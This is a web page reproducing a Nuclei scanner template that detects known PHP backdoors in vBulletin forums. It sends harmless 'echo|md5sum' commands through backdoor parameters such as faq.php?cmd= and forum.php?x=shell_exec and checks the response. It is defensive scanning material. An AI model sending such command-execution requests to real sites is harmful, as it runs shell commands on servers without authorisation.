vbulletin-backdoor: vBulletin Backdoor - Detect

2025-08-01 vBulletin PoC Public

Description

No description available.

PoC

id: vbulletin-backdoor

info:
  name: vBulletin Backdoor - Detect
  author: MaStErCho
  severity: high
  reference:
    - https://github.com/OWASP/vbscan
    - https://blog.sucuri.net/2017/01/vbulletin-malware-hackers-compete-backdoor-control.html
  classification:
    cwe-id: CWE-78
  metadata:
    max-request: 21
  tags: backdoor,php,vbulletin,rce,vuln

flow: http(1) && http(2)

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        part: body
        words:
          - "content=\"vBulletin"
          - "id=\"vbulletin_css"
          - "clientscript/vbulletin"
          - "vBulletin_init"
        condition: or
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'

    payloads:
      paths:
        - 'boards'
        - 'board'
        - 'forum'
        - 'forums'
        - 'vb'

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{md5(num)}}')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502210081d30ca62ebadd13ddcc3211df58100e30151ecf11316b3b55ec08d0f990e4140220307df182652d100e6f09c9c10b4266fe7c4099c21a65e615ccc54e8e89e6ee1b:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities